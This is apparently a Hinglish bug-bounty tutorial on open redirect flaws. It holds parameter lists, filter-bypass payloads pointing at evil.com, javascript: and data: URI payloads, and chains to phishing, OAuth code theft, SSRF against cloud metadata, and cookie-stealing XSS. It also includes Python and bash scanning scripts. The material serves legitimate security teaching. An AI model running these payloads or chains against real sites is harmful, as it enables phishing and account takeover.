2026-4-30 05:13:28 Author: infosecwriteups.com(查看原文) 阅读量:7 收藏
Press enter or click to view image in full size
Series: Bug Bounty Zero se Hero 🦸 | Article #22
By HackerMD | 16 min read
Aaj Kya Seekhenge?
- Open Redirect kya hai bilkul basics se
- Kahan dhundhen input points
- Bypass techniques elite level
- Impact chains phishing, OAuth bypass, SSRF
- Automated + Manual testing
- Complete bug bounty workflow
Kyun zaroori hai? Open Redirect akele $100-$500 bounty deta hai lekin SSRF ke saath, OAuth bypass ke saath, ya phishing chain mein yeh Critical ban jaata hai! Ek simple parameter se account takeover possible hai!
Open Redirect Kya Hai? Simple Analogy
Socho ek Trusted Receptionist hai company mein:
Normal:
Visitor: "Mujhe Conference Room A le chalo"
Receptionist: Conference Room A le jaata hai ✅Open Redirect:
Attacker: "Visitor ko yahan se evil building
mein le jaao" — forged note
Receptionist: "Theek hai!" — blindly follow karta hai! 😱
Problem:
→ Visitor ne trusted company ka naam dekha
→ Socha legitimate redirect hai
→ Actually evil site pe pahunch gaya!
Website mein:
Legitimate URL:
https://trusted-bank.com/login?next=https://trusted-bank.com/dashboardAttacker ka URL:
https://trusted-bank.com/login?next=https://evil-phishing.com
→ User trusted-bank.com ka link dekhta hai
→ Click karta hai → evil-phishing.com pe redirect!
→ Apna password enter karta hai! 😱
PART 1: Kahan Dhundhen Parameter Names
# ─── COMMON REDIRECT PARAMETERS ──────────
?next=
?url=
?redirect=
?redirect_url=
?redirect_uri=
?return=
?return_url=
?returnUrl=
?returnTo=
?goto=
?dest=
?destination=
?target=
?link=
?to=
?ref=
?location=
?continue=
?forward=
?go=
?r=
?redir=
?out=
?view=
?callback=
?from=
?exit=# ─── OAUTH/SSO SPECIFIC ──────────────────
?redirect_uri=
?callback_url=
?post_logout_redirect_uri=
?success_url=
?error_url=
?after_login=
?after_logout=
# ─── HTTP HEADERS ─────────────────────────
Referer: header
Location: response header
PART 2: Basic Payloads Test Karo
Basic Test:
# Pehle apna server setup karo:
# Interactsh ya simple Python server:
python3 -m http.server 8888# Basic payloads:
?next=https://evil.com
?url=https://evil.com
?redirect=https://evil.com
?redirect_uri=https://evil.com
# Agar redirect hota hai → Open Redirect confirmed! ✅
Variations Try Karo:
# Protocol variations:
?url=https://evil.com
?url=http://evil.com
?url=//evil.com ← Protocol-relative!
?url=\/\/evil.com
?url=\\evil.com# JavaScript protocol:
?url=javascript:alert(1) ← XSS bhi possible!
?url=data:text/html,<script>alert(1)</script>
PART 3: Bypass Techniques Elite Level!
Bypass 1: @ Symbol Trick
# Browser URL parsing:
https://[email protected]
→ Browser evil.com pe jaata hai!
→ User sirf "trusted.com" dekhta hai URL mein!?url=https://[email protected]
?redirect=https://[email protected]
Bypass 2: Subdomain Confusion
?url=https://evil.com.target.com
# Agar server check kare "target.com" string
# → evil.com.target.com bhi pass ho jaata hai!?url=https://target.com.evil.com
?url=https://evil-target.com
?url=https://evilXtarget.com
Bypass 3: URL Fragment
?url=https://evil.com#target.com
?url=https://evil.com#.target.com
?url=https://evil.com/.target.com
# Fragment ke baad target.com — filter bypass!Bypass 4: CRLF + Whitespace
?url=https://evil.com%09
?url=https://evil.com%0a
?url=https://evil.com%0d
?url=https://evil.com%00
?url=%20https://evil.com
?url=%0ahttps://evil.comBypass 5: Double Slash
?url=//evil.com
?url=///evil.com
?url=////evil.com
?url=https:///evil.com
?url=/\evil.com
?url=\/evil.comBypass 6: URL Encoding
?url=https%3A%2F%2Fevil.com
?url=https%3A//evil.com
?url=%68%74%74%70%73%3A%2F%2Fevil.com
# Double encoding:
?url=https%253A%252F%252Fevil.comBypass 7: IP Address
?url=http://1.2.3.4 → IP directly
?url=http://0x1.0x2.0x3.0x4 → Hex IP
?url=http://16909060 → Decimal IP of 1.2.3.4Bypass 8: Open Redirect via Referer
GET /logout HTTP/1.1
Host: target.com
Referer: https://evil.com# Logout ke baad Referer pe redirect kare?
→ Open Redirect via header!
PART 4: Impact Chains Yahan Asli Power Hai!
Chain 1: Open Redirect → Phishing
Step 1: Open Redirect dhundho:
https://trusted-bank.com/login?next=https://evil.comStep 2: Evil site banao — trusted bank jaisi dikhti ho
Step 3: Email bhejo victim ko:
"Your account is compromised!
Click here to secure: https://trusted-bank.com/login?next=https://evil.com"
Step 4: Victim:
→ URL mein trusted-bank.com dekhta hai ✅
→ Click karta hai
→ Evil site pe redirect hota hai
→ Password enter karta hai → STOLEN! 💀
Impact: High → Critical!
Bounty: $500-$2000
Chain 2: Open Redirect → OAuth Token Steal CRITICAL!
OAuth flow normal:
1. User → "Login with Google" click karta hai
2. Google → target.com/callback?code=ABC pe redirect karta hai
3. target.com code se access token leta haiOAuth + Open Redirect attack:
1. target.com/oauth/start?redirect_uri=https://evil.com dhundho
2. Google ko lagta hai legitimate redirect_uri hai
(kyunki target.com ne register kiya tha)
3. Google → evil.com?code=ABC pe redirect karta hai!
4. evil.com code steal karta hai
5. Google account access! 🔴
Yeh = Critical! Account Takeover!
Bounty: $3000-$10000+
Chain 3: Open Redirect → SSRF
Agar server-side redirect follow karta hai:?url=https://trusted.com/redirect?to=http://169.254.169.254/
Step 1: target.com/fetch?url=https://trusted.com/redirect?to=...
Step 2: Server trusted.com pe jaata hai
Step 3: trusted.com redirect karta hai → 169.254.169.254
Step 4: Server follow karta hai → AWS Metadata!
Open Redirect + SSRF = Critical!
Chain 4: Open Redirect → XSS
?next=javascript:alert(document.cookie)
?url=data:text/html,<script>alert(1)</script># Agar JavaScript protocol allowed hai:
→ XSS execution!
→ Cookie steal!
→ Account takeover!
PART 5: OAuth redirect_uri Special Attention!
Bug bounty mein sabse valuable Open Redirect!
Normal OAuth:
POST /oauth/authorize
redirect_uri=https://target.com/callbackAttack — Exact match bypass:
redirect_uri=https://target.com/callback?next=https://evil.com
# Agar server only prefix check kare → Bypass!
redirect_uri=https://target.com.evil.com/callback
redirect_uri=https://target.com/callback/../../../redirect?url=evil.com
Path traversal bypass:
redirect_uri=https://target.com/oauth/../open-redirect?url=evil.com
# Agar bypass hua:
→ OAuth token evil.com pe jaayega
→ Account takeover!
→ Critical bounty!
PART 6: Automated Testing
Tool 1: Waybackurls + grep Fastest Method
# Redirect parameters dhundho historical URLs mein:
gau target.com | grep -iE \
"next=|url=|redirect=|return=|goto=|
dest=|destination=|target=|redir=|
redirect_uri=|callback=" \
> redirect_params.txtecho "Redirect params: $(wc -l < redirect_params.txt)"
# Test karo:
cat redirect_params.txt | \
qsreplace "https://evil.com" | \
httpx -silent \
-location \
-mc 301,302,303 | \
grep "evil.com" > open_redirects.txt
Tool 2: Nuclei Open Redirect Templates
nuclei -l targets.txt \
-t ~/nuclei-templates/vulnerabilities/generic/open-redirect.yaml \
-o redirect_found.txtnuclei -l targets.txt \
-tags redirect \
-o nuclei_redirects.txt
Tool 3: Custom Python Tester
#!/usr/bin/env python3
# open_redirect_test.pyimport requests
import sys
TARGET_URL = sys.argv[1]
EVIL_DOMAIN = "https://evil-test-12345.com"
PAYLOADS = [
EVIL_DOMAIN,
f"//{EVIL_DOMAIN.replace('https://','')}",
f"///{EVIL_DOMAIN.replace('https://','')}",
f"https://trusted.com@{EVIL_DOMAIN.replace('https://','')}",
f"{EVIL_DOMAIN}#.trusted.com",
f"javascript:alert(1)",
f"%2F%2F{EVIL_DOMAIN.replace('https://','')}",
f"https:////{EVIL_DOMAIN.replace('https://','')}",
]
PARAMS = ["next","url","redirect","return",
"goto","dest","redir","target",
"redirect_url","returnUrl","continue"]
print(f"🔍 Testing Open Redirect: {TARGET_URL}\n")
for param in PARAMS:
for payload in PAYLOADS:
test_url = f"{TARGET_URL}?{param}={payload}"
try:
r = requests.get(
test_url,
allow_redirects=False,
timeout=5,
verify=False
)
location = r.headers.get("Location","")
if "evil-test" in location or \
"javascript" in location.lower():
print(f"🔴 FOUND! Param: {param}")
print(f" Payload: {payload}")
print(f" Location: {location}")
print(f" URL: {test_url}\n")
except:
pass
PART 7: Complete Elite Workflow
#!/bin/bash
# open_redirect_hunt.shTARGET=$1
DIR="redirect_${TARGET}"
mkdir -p $DIR
echo "🔀 Open Redirect Hunt: $TARGET"
echo "════════════════════════════════"
# Step 1: Historical URLs se redirect params
echo "📡 Finding redirect parameters..."
gau $TARGET | grep -iE \
"next=|url=|redirect=|return=|goto=|
dest=|redir=|redirect_uri=|callback=" | \
uro > $DIR/redirect_urls.txt
echo "✅ URLs: $(wc -l < $DIR/redirect_urls.txt)"
# Step 2: Live check
cat $DIR/redirect_urls.txt | \
httpx -silent -mc 200,301,302 \
> $DIR/live_redirects.txt
# Step 3: Payload inject + test
echo "💉 Testing payloads..."
cat $DIR/live_redirects.txt | \
qsreplace "https://evil.com" | \
httpx -silent \
-follow-redirects \
-location \
-mc 301,302 | \
grep "evil.com" > $DIR/open_redirects.txt
# Step 4: Nuclei scan
nuclei -l $DIR/live_redirects.txt \
-tags redirect,open-redirect \
-silent \
-o $DIR/nuclei_redirect.txt 2>/dev/null
# Step 5: OAuth redirect_uri check
echo "🔑 OAuth redirect_uri check..."
gau $TARGET | grep -iE \
"redirect_uri=|callback_url=" | \
uro > $DIR/oauth_redirects.txt
echo "════════════════════════════════"
echo "📊 Results:"
echo "Redirect URLs : $(wc -l < $DIR/redirect_urls.txt)"
echo "Open Redirects : $(wc -l < $DIR/open_redirects.txt)"
echo "OAuth URIs : $(wc -l < $DIR/oauth_redirects.txt)"
echo "Nuclei Findings : $(wc -l < $DIR/nuclei_redirect.txt)"
echo "Results in : $DIR/"
Open Redirect Cheat Sheet
# ─── BASIC PAYLOADS ───────────────────────
?next=https://evil.com
?url=//evil.com
?redirect=\/\/evil.com# ─── BYPASS ───────────────────────────────
@evil.com → https://[email protected]
#evil.com → https://trusted.com#evil.com
%09evil.com → Tab character
%0aevil.com → Newline
///evil.com → Triple slash
javascript:alert(1) → XSS via redirect
# ─── OAUTH BYPASS ─────────────────────────
redirect_uri=https://target.com/callback?url=evil.com
redirect_uri=https://target.com.evil.com
redirect_uri=https://target.com/../redirect?to=evil.com
# ─── CHAINS ───────────────────────────────
Open Redirect + Phishing → Social engineering
Open Redirect + OAuth → Account Takeover!
Open Redirect + SSRF → Internal access!
Open Redirect + XSS → Cookie steal!
# ─── TOOLS ────────────────────────────────
gau + grep + qsreplace + httpx → Automated
nuclei -tags redirect → Templates
Manual Burp testing → Bypass test
Bounty Impact Guide
🟢 Low ($100-200):
→ Basic redirect to external site
→ No authentication context
→ Non-sensitive application🟡 Medium ($200-500):
→ Authenticated redirect
→ Login flow redirect
→ Phishing potential
🟠 High ($500-2000):
→ OAuth redirect_uri bypass
→ Authentication token exposure
→ SSRF chain potential
🔴 Critical ($2000-10000+):
→ OAuth token steal → Account takeover
→ SSRF chain → Internal access
→ Admin panel redirect
Aaj Ka Homework
# 1. Waybackurls se redirect params dhundho:
gau hackerone.com | grep -iE "next=|url=|redirect=" | head -20# 2. qsreplace install karo:
go install github.com/tomnomnom/qsreplace@latest
# 3. Practice:
echo "https://example.com/login?next=https://example.com" | \
qsreplace "https://evil.com"
# 4. Burp Suite mein manually test karo:
# Koi login page dhundho → next= parameter
# evil.com se replace karo → Redirect check karo
# 5. OAuth apps dhundho:
# "Login with Google/Facebook" wale apps
# redirect_uri parameter test karo
Quick Revision
🔀 Open Redirect = Unvalidated URL redirect
📍 Find = next=, url=, redirect=,
return=, goto=, dest=
🛡️ Bypass = @ trick, //, fragment,
encoding, whitespace
⛓️ Chains = + Phishing → Social eng
+ OAuth → Account takeover!
+ SSRF → Internal access!
+ XSS → Cookie steal!
🤖 Tools = gau + qsreplace + httpx
nuclei -tags redirect
💰 Alone = Low-Medium ($100-500)
💰 With chain = Critical ($2000-10000+)!Meri Baat…
Ek SaaS app pe maine dekha:
https://target.com/auth/logout?redirect=https://target.com/homeMaine test kiya:
https://target.com/auth/logout?redirect=https://evil.comRedirect ho gaya evil.com pe! Open Redirect confirmed.
Get Hacker MD’s stories in your inbox
Join Medium for free to get updates from this writer.
Phishing PoC banaya lekin bounty sirf $200 thi।
Phir socha OAuth bhi hai is app mein!
https://target.com/oauth/google/callback?
redirect_uri=https://target.com/auth/logout?redirect=https://evil.comGoogle OAuth token → target.com → logout → evil.com!
Token URL mein tha evil.com pe Google OAuth code mil gaya!
Account Takeover chain complete!
Bounty: $3,500 Critical! 🎉
Lesson: Open Redirect akele weak hai lekin chain banao aur value 10x ho jaati hai!
Agle article mein Authentication Bypass Login page ko bypass karo, Admin bano, Tokens exploit karo! 🔥
HackerMD Bug Bounty Hunter | Cybersecurity Researcher
GitHub: BotGJ16 | Medium: @HackerMD
Previous: Article #21 Backup Files Exposure
Next: Article #23 Authentication Bypass: Login Bypass Se Admin Tak!
#OpenRedirect #BugBounty #WebSecurity #EthicalHacking #Hinglish #OAuthBypass #HackerMD
如有侵权请联系:admin#unsafe.sh